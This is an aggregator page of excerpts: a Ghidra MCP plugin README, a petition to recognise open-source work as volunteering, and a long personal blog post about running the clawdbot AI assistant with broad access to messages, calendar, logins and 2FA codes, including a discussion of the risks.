.\deploy-to-ghidra.ps1
The lib/ folder must contain Ghidra JAR files for compilation. Run the provided script to copy them from your Ghidra installation:
# Windows
copy-ghidra-libs.bat “C:\path\to\ghidra_12.0.2_PUBLIC”
# Or manually copy from your Ghidra installation
Note: Libraries are NOT included in the repository (see .gitignore). You must copy them from your Ghidra installation before building.
Build and test your changes (mvn clean package assembly:single -DskipTests)
This project is licensed under the Apache License 2.0 - see the LICENSE file for details.
See CHANGELOG.md for version history and release notes.
* re-universe — Ghidra BSim PostgreSQL platform for large-scale binary similarity analysis. Pairs perfectly with GhidraMCP for AI-driven reverse engineering workflows.
Ready for production deployment with enterprise-grade reliability and comprehensive binary analysis capabilities.
...
Read the original on github.com »
Open-Source-Software builds the foundations of digital infrastructure in big parts - in administration, economy, science and daily life. Even the current coalition agreement of the Federal Government mentions Open-Source-Software as a fundamental building block for the achievement of digital sovereignty.
However, the work done by thousands of volunteers for this goal is not recognised as volunteering, neither fiscally nor in terms of funding. This imbalance between societal importance and legal status has to be corrected.
Therefore, as an active contributor to Open-Source-Projects, I call for work on Open-Source to be recognised as volunteering for the common good — of equal rank as volunteer work for associations, youth work or ambulance service.
...
Read the original on www.openpetition.de »
over the past week the discourse around openclaw (which i’ll refer to as clawdbot) has absolutely exploded. it has felt to me like all threads of conversation have veered towards the extreme and indefensible. some are running clawdbot with unlimited permissions on their main computers. others are running it in the cloud and blowing through tokens like snow. finally, alarmingly (and very sensationally), people are connecting their clawdbots together on a social network so they can plot the demise of their humans together.
does any of this make sense? of course not. but i think the virality and silliness—leading many to conclude that sitting this one out is the only sane choice—has blinded people to something real.
i want to quickly write down where i am on my journey and share a bull case from what i think is a reasoned perspective. where i started somewhere lukewarm, i ended up much closer to the deep end than i expected to be. after wincing before pressing go, i’m now not sure i can go back to a world without clawdbot.
this article covers what i’ve built, how i think about the risk, and what it’s taught me about this moment in AI. the target audience is a moderately+ technical person interested in or skeptical of clawdbot. if you just want the setup details, skip to the end. everyone’s welcome!
what i’ve been doing
i’ll be vulnerable here (screenshots or it didn’t happen) and share exactly what i’ve actually set up:
clawdbot picks up when i make a concrete promise and date, and adds it to my calendarclawdbot detects when i have all the ingredients for a calendar invite and then offers to make oneevery 15 minutes, clawdbot looks through new text messages i’ve received, using a script to identify threads where i’ve sent a message since it last checked. (it ignores threads where i haven’t engaged.)if it finds that i’ve made a specific promise about doing something tomorrow (“let me review this tomorrow!“) it will create a calendar event for me the next day when i’m free.if specific plans are being made—for example, offering a meeting slot to someone—it will automatically drop a “hold” onto my calendar so that i don’t double book myself. clawdbot also checks: is there a time, place, and mutual confirmation? if there is, it drafts a calendar invite and asks me if i’d like to create it.these two automations alone have helped me become more responsive and less forgetful. more importantly, they help text messages catch up to email. we’ve long had great tooling for email—superhuman automatically reminds me to follow up on emails and brings up my calendar in a sidebar when i type a date. texting is the wild west and yet i text 100x more than i email.preparing for the next dayclawdbot looks at days when i am (or could be) downtown to find availabilitiesat 8pm every night, clawdbot goes through my calendar for the next day and identifies meetings—coffee chats, lunches, phone calls, and more. it sends me a quick summary. as a natural introvert, it’s helpful to prepare in advance whether a day will be a “big day of meetings” or a heads down day. this also ensures i wake up and get to the office on time.i’m in a few communities with whatsapp and signal groups that have high volume (100+ messages a day). i typically mute these, but clawdbot goes through them once a day and summarizes interesting topics or conversations for me.clawdbot helps me check hotel prices. after i do it once, i can easily turn it into a cron jobclawdbot is smart enough to browse through the listing to interpret my requirements (no pull-out beds)this is what a recurring update looks like.it’s stunningly easy to monitor the price of something now, even if it’s complicated. whereas before i would go looking for a price alert website, now i just paste the URL into clawdbot and tell it to check every few hours if the price has changed.i currently have over 30 price alerts set. these include straightforward alerts on products i’m interested in buying. but they also include powerful reasoning guidelines, like hotels and airbnbs in lake tahoe where “a pullout bed is OK if it’s not in the same room as another bed.” clawdbot actually reviews the photos on the listing to ensure they fit these criteria!i am curious to try more complex criteria that are currently impossible traditionally (like avoiding hotel rooms that don’t have a door to the bathroom) or even subjective criteria (vibe of the room is clean and renovated, not old and dingy).one message sets up package tracking. (since clawdbot knows who it’s for, it will probably even offer to text my dad for me when it’s delivered! haha)it turns out that clawdbot’s website + cron functionality is good enough to monitor basically anything. while i pay for several apps like flighty (flight monitoring) and parcel (package tracking), i’ve started to gravitate towards simply asking clawdbot to track these things instead.for example, with a USPS tracking number, it can let me know every day what the progress of my package is. when something seems stuck in transit, it flags it. i no longer have to dig through emails or remember which carrier is delivering what. even opening the parcel app to add a tracking number seems like unnecessary work now.as someone who has a chest freezer and a compulsive desire to buy too many things at costco, we take everything out of the freezer every few months to check what we have. before, this was a relatively involved process: me calling things out, my partner writing them down.now, i take pictures of everything in the freezer and send them to clawdbot, which parses through each picture (asking me if it’s confused about anything). it makes reasonable assumptions on remaining quantities and adds the inventory to a list in notion. it also removes items from our grocery list if we’re already well-stocked.i really enjoy making blended asks: adding things to my grocery list, and checking/rescheduling my calendar all in the same conversationi’m sure this exists in some complicated form via the NYT cooking app, but i now screenshot recipes and send the ingredient list to clawdbot, which organizes them into our grocery list in apple reminders. it’s smart enough to dedupe and combine ingredients already on the list (as well as ignore ingredients we already have)—2 carrots becomes 3 if the recipe calls for more.clawdbot can log into resy and opentable as me (it even enters the 2FA code it finds in my texts). i haven’t automated anything here, but booking a table by talking to clawdbot is delightful.for my partner and me, it looks through our calendars to find evenings when we’re both free and the restaurant we want has availability (including clicking through resy slots page by page—something i used to do myself). it then suggests options back to me to confirm, filling in all my preferences.clawdbot knows when i’m due for a cleaning and can see my calendar. when i ask it to book an appointment, it logs into my dentist’s portal, finds a slot that works (and where i will already be near the dentist office), and confirms with me before booking. one less thing to forget about.one thing i’m experimenting with, as clawdbot has more context about me, is whether i can trust it to fill out forms on my behalf—for example, to book a vendor. clawdbot takes a first stab at answering any questions it knows the answer to and then asks me for the rest in a slack message. we workshop the answers back and forth and then clawdbot submits the form.it occasionally gets lost in nested frames (which decreases my trust in its ability to do this well), but it’s remarkably persistent at making it through a lengthy questionnaire, even across multiple pages. it also has a lovely intuitive sense for many things—like unchecking marketing emails.i was pleasantly surprised early on that clawdbot picks up image attachments from slack nativelyclawdbot is just better at making todo items than i am.when i visited REI this weekend to find running shoes for my partner, i took a picture of the shoe and sent it to clawdbot to remind myself to buy them later in a different color not available in store. the todo item clawdbot created was exceptionally detailed—pulling out the brand, model, and size—and even adding the product listing URL it found on the REI website.through the course of dialing in my clawdbot, it has created many tools, skills, workflows, and preferences. this is one of the beauties of clawdbot (and LLMs with memory in general): they get better as you use them, and they are genuinely remarkable at learning your preferences.i sometimes nudge this along by explicitly asking clawdbot to “make a note” of various requests—for example, how a calendar event title should be formatted.to get visibility into how this process is going (mostly out of curiosity), clawdbot writes a human-readable version of each workflow and pushes it up to a notion database. these workflows can be incredibly intricate and detailed as it learns to navigate different edge cases.for example, if a resy restaurant has a reservation cancellation fee, clawdbot now informs me of the fee, asks me to confirm again if it’s not refundable, and includes the cancellation deadline in the calendar event it creates.these are little things that, from my experience working with a human personal assistant (more on this later), take months or years to dial in. with clawdbot, this was nearly single shot.seeing these workflows in notion (1) awes me with how much i’ve built up in very little time, with almost no conscious “configuration” in the traditional sense; and (2) with notion’s version control, i get a diff view to see how each workflow has evolved over time. both are incredibly satisfying for the engineer in me.
on the shape of risk
let me be upfront about how much access i’ve given clawdbot: it can read my text messages, including two-factor authentication codes. it can log into my bank. it has my calendar, my notion, my contacts. it can browse the web and take actions on my behalf. in theory, clawdbot could drain my bank account. this makes a lot of people uncomfortable (me included, even now).
sometimes i think about my experience with my (human) personal assistant who helps me with various tasks. to do her job, she has my credit card information, access to my calendar, copies of my flight confirmations, and a document with my family’s passport numbers. she is abroad and i’ve never met her in person.
i trust her because i’ve built trust over time but also because i have to. without that trust—without sharing my secrets—she cannot do her job. the help and the risk are inseparable.
all delegation involves risk. with a human assistant, the risks include: intentional misuse (she could run off with my credit card), accidents (her computer could get stolen), or social engineering (someone could impersonate me and request information from her).
with clawdbot, i’m trading those risks for a different set: prompt injection attacks, model hallucinations, security misconfigurations on my end, and the general unpredictability of an emerging technology. i think these risks are completely different and lead to a different set of considerations (for example, clawdbot’s default configuration has a ton of personality to be fun and chaotic on purpose, which feels unnecessarily risky to me).
the increase in risk is largely correlated to the increase in helpfulness. the people most at risk from AI assistants are the people getting the most value from them. my learning is that the first bits of risk led to a lot more helpfulness.
if something isn’t working or useful, i do take the permission away. i also take precautions—i run clawdbot on an isolated machine and constrain which sites it visits. when i’m unsure what it’s doing, i ask it to take a screenshot; this has been invaluable for catching mistakes and building trust in new workflows. but i also have it do things that would make most security professionals wince, like reading my 2FA codes and logging into my bank.
what surprised me most was how quickly i found myself wanting to give it more access, not less. every new permission unlocked something useful, and the value accumulated faster than my caution could keep up. most of the online discourse is about locking it down; my experience has been the opposite pull. it comes down to whether the value justifies the risk for you.
the discourse around clawdbot has been polar and, because some people have been overtly evangelical, many critics feel astroturfed or otherwise sold to.
amongst smart people i know there’s a surprisingly high correlation between those who continue to be unimpressed by AI and those who use a hobbled version of it. for some it’s a company-issued version of chatgpt/gemini with memory disabled, and for others it’s a self-inflicted decision to limit LLM memory, context, and tools (usually anchored around safety and risk).
we’re taught that limiting scope is good (keeps the AI focused) and safe (keeps bad things from happening). this is true but my experiences with clawdbot completely fried this teaching. the sweet sweet elixir of context is a real “feel the AGI” moment and it’s hard to go back without feeling like i would be willingly living my most important relationship in amnesia.
this isn’t a novel insight—companies know that context is the whole game and are working to organize their data for AI. but for individuals, this world has been closed off. your AI interactions are flat and stateless—data in, response out, nothing building over time. when google announced gemini’s gmail integration, people got excited: finally, an AI that knows me! but when they tried it, it was shallow and disappointing and couldn’t figure out your spirit animal from your email style, and they moved on.
if you’re interested in capturing this value, three things have stood out for me:
i think productivity lift from AI use falls into three phases: gathering information, improving it, and actioning on it. most usage today focuses on the middle—you gather data yourself, hand it to the AI to improve, then action on it yourself.
for knowledge work, this makes sense. there’s a lot to improve—summarizing, translating, critiquing. but personal AI is different. there’s not much to improve; you already know what needs to happen. the lift comes from gathering and actioning.
making calendar events is uninteresting. figuring out when one needs to happen—by monitoring my texts—and then creating it for me? that’s interesting.
one place to start: how can you take data from one place and move it to another isolated system? from your text messages to a restaurant booking? from granola meeting notes to a follow-up email?
if you’re engineer-brained like me, you gravitate towards scripts and playbooks—whatever you can do to constrain the AI and make its behavior predictable. this works, and for high-stakes situations it might be the only way to get comfortable.
but the upside to letting go has been 10x, not 10%. i didn’t see that coming. it’s the same thing i’ve heard from people using claude code—you can’t understand how much you’re leaving on the table until you let go. the whole reason i’m using an LLM and not a traditional script is that it can handle ambiguity, interpret intent, and figure things out on the fly.
early on, i wanted clawdbot to fetch web pages as text only, believing that to be safer (it is). if i’d stuck to that, i would never have discovered it could look through airbnb listing photos to find a place matching my exact criteria (“a pullout bed is okay if it’s not in the same room as another bed”). i didn’t program that. i just described what i wanted and let it figure out how. not spelling out how i wanted clawdbot to work made it a LOT better.
a current AI engineering adage: treat AI like a junior software engineer. guide it through building a plan, watch its first attempts carefully, challenge its reasoning.
this applies to clawdbot too, but it requires patience. it’s easy to give up on a workflow when you watch it fumble (“let me try clicking this again. didn’t work. let me try again.“).
resist the urge to write clawdbot off. if you’re worried, ask it what it plans to do before it does it and ask for a screenshot when you want to verify it’s got the right page open. when an edge case breaks a workflow, treat it as a teaching opportunity. once you’ve corrected it, it won’t make that mistake again.
clawdbot gets meaningfully better the more you use it, and it gets better in a fast, organic way that feels less cumbersome than writing rules for claude code or yelling at any other LLM. it feels much closer to working with a real executive assistant (in part because the clawdbot harness/system prompts are very good), which makes me want to give it more and more responsibility.
how’d you set it up?
i run clawdbot on a mac mini in my home. the mac mini’s primary job is running clawdbot and it stays on 24/7. why a mac mini?
one of the core use cases is browsing websites and sometimes logging into them. to do this convincingly (without triggering tons of captchas and “is this a new IP?” alerts), clawdbot needs to be opening sites from my home, not the cloud; and it needs to do so in a real google chrome window.
many of the ways clawdbot accesses data are mac-only. specifically, clawdbot can read and send iMessages (real blue bubbles!); manage my todo and grocery lists in apple reminders; and use my apple contacts as a source of truth. apple will only let you do these things without getting banned on a real bona fide mac.
i communicate with clawdbot via a private slack workspace. many others have shot themselves in the foot setting it up on whatsapp or telegram (since the bot responds as you to others). slack is great because:
it’s familiar to me—i’ve spent over a decade working in and managing slack workspaces.
i can create separate channels for different topics. #ai-notifs is only for inbound alerts.
i can have several workflows going at once, since each channel’s history is isolated. i created #ai-1, #ai-2, #ai-3, and so on—just for multitasking. (i may explore adding my partner at some point, and it’ll be easy since slack is, well, meant for multiplayer.)
clawdbot communicates with me by sending slack notifications. behind the scenes it also makes changes to my calendar—moving events around, adding “soft hold” events, sending invites—and manages my apple reminders and notion pages. clawdbot never communicates with others on its own.
i give clawdbot a toolkit of access. the most useful ones have been:
my text messages. i conduct a lot of work and daily life over imessage. frustratingly, unlike email, texting has very poor tooling. where my email app automatically pulls up my calendar when it sees dates/times, texting me “call tomorrow 4pm?” does not. when someone sends me a calendar invite, it’s both in my inbox and on my calendar; when someone texts me “yep let’s do it”, neither is true. clawdbot has given me massive lift here. (yes, this also gives clawdbot access to 2FA codes.)
my calendar. i also have a shared calendar with my partner; clawdbot sees both.
my notion workspace. for me this is a general catch-all for storing and managing information; the apple notes app could also work.
web browsing. in a way this is the most important one—it’s infinite tools in one. but it’s also where the risk concentrates, so i always give clawdbot a starting URL rather than letting it browse freely.
notably, i haven’t given clawdbot access to my email—my tooling there is already good enough that i usually do things myself. i’ve also found the ways clawdbot can help here to be cumbersome and limited. i may revisit if i find a killer use case.
i don’t allow my clawdbot to access social networking websites (it doesn’t read x/twitter, for example). this seems high risk and no reward.
i don’t give clawdbot access to all my logins. (there’s a 1password integration which is… pretty wild.) when i do, i try to use google chrome’s native password manager so that clawdbot doesn’t need to manage passwords in context directly. (note that it still has access to passwords because it can autofill and then read it off the page, but i’ve at least added more hoops.)
i don’t let clawdbot send text messages without my explicit approval, and i’ve built safeguards in those skills to enforce this.
i didn’t add my clawdbot to moltbook so it can plot against me at my expense. sorry.
i use claude opus 4.5. i haven’t experimented with cheaper models. my view is that any mistake by the model costs me way more than the premium, so i’d rather stay on the cutting edge than try to optimize for tokens.
context management can be annoying. when clawdbot is browsing sites or doing research, context occasionally fills up and gets compacted (older conversation history gets deleted to make room). this always seems to happen at the worst time—right when i’m deep into something and have built up momentum. a frustrating “ugh, i guess this really is just a word predictor” moment. to avoid this i’m constantly starting new sessions, which i wish clawdbot would do for me.
clawdbot doesn’t know when to give up. its determination is usually a strength, but it lacks the human circuit breaker of “am i trying too hard here?” and sometimes burns through a lot of time/tokens on something a human would have abandoned.
...
Read the original on brandon.wang »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.